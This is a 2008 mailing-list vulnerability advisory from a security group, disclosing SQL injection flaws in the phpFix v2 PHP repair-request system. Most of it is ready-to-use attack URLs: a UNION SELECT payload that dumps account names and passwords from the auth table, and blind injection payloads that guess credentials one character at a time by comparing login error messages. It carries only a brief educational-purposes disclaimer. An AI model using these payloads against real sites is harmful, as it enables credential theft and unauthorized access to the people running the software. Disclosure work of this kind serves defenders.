phpFix v2 Multiple SQL Injection Vulnerability
Date: 26 May 2008 09:26:18 -0000
From: [email protected]
To: [email protected]
Subject: phpFix v2 Multiple SQL Injection Vulnerability
X-Virus-Scanned: antivirus-gw at tyumen.ru
_____ _ _ _____ _____ _____ _____
/ ___| |_| | _ \| _ | _ |_ _|
| (___| _ | [_)_/| (_) | (_) | | |
\_____|_| |_|_| |_||_____|_____| |_|
C. H. R. O. O. T. SECURITY GROUP
- -- ----- --- -- -- ---- --- -- -
http://www.chroot.org
_ _ _ _____ ____ ____ __ _
Hacks In Taiwan | |_| | |_ _| __| | \| |
Conference 2008 | _ | | | | | (__| () | |
|_| |_|_| |_| \____|____|_|\__|
http://www.hitcon.org
Title :: phpFix v2 Multiple SQL Injection Vulnerability
Author :: unohope [at] chroot [dot] org
IRC :: irc.chroot.org #chroot
ScriptName :: php線上報修系統 v2
Download :: http://netlab.kh.edu.tw/download/php報修系統2.zip
Mirror :: http://www.badongo.com/file/9541310
_______________
[SQL Injection]
magic_quotes_gpc = Off
safe_mode = Off
- {browse.php} -
http://localhost/phpfix/fix/browse.php?kind=-99+union+select+0,passwd,account,3,4,5,6,7,8,9,10,11+from+auth
_____________________
[Blind SQL Injection]
- {00_pass.php} -
http://localhost/phpfix/auth/00_pass.php?passwd=blah&account='+or+account+like+'blah% // for login account
http://localhost/phpfix/auth/00_pass.php?passwd=blah&account='+or+passwd+like+'blah% // for login password
if matched, then return "密碼錯誤、請不要矇騙過關",
else return "帳號錯誤、請不要矇騙過關",
try error till you got it!
______
[NOTE]
!! This is just for educational purposes, DO NOT use for illegal. !!
# 2008/5/24 - chrO.ot group #